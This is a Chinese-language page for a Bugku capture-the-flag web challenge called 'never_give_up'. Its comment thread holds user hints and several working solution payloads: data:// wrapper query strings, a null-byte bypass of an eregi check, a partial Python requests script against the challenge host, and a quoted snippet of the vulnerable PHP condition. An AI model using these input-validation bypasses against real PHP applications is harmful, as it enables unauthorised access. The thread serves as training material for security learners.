never_give_upWEB 未解决

分数: 25 金币: 3
题目作者: 未知
一  血: blue
一血奖励: 1金币
解  决: 3592
提  示:
描  述:
作者:御结冰城
评论
冯飞99 1年前

总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。

回复 2

2089669143 1年前

为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我

回复 0
MiracleWolf 1年前

在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。

回复 0

莴笋要种泥里 1年前

我也是,什么原因

回复 0

evens 1年前

?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=

回复 0

wxy1343 1年前

http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111

回复 0

xclay 1年前

伙伴们输入参数的时候一定不要带任何引号,不然不好使

回复 0

Restwlaq 1年前

第一步直接view-source:url/1p.html。第二步,如果用Bp就可以发现靶机php版本响应是5.5,一篇文章说php://input在5.3以后就不用了。所以小伙伴们不要纠结php://input了,使用data://协议吧

回复 0

joyoung 1年前

?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345

回复 0

zdfy005 1年前

import requests url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000' head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} data='b

回复 0

zdfy005 1年前

$data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

回复 0

笨笨笨蛋 2年前

真的没懂

回复 3

WriteUp

image
harry

3 金币

评分(20)

解题动态

1058886009 攻破了该题 15小时前
13732263537 攻破了该题 17小时前
Rmgcc 攻破了该题 1天前
Gfyu 攻破了该题 1天前
shengjiang 攻破了该题 2天前
abbccc 攻破了该题 3天前
tonycai 攻破了该题 3天前
3tar 攻破了该题 4天前
小番茄 攻破了该题 5天前
2663645309 攻破了该题 5天前
Zhou_re-pwn 攻破了该题 5天前
龙天宇 攻破了该题 6天前
hwww 攻破了该题 7天前
cheng00 攻破了该题 8天前
bbggddaa 攻破了该题 8天前
sraiL 攻破了该题 8天前
zhang0918 攻破了该题 9天前
13470772171 攻破了该题 9天前
vnuesa 攻破了该题 9天前
JJJY 攻破了该题 10天前
问题反馈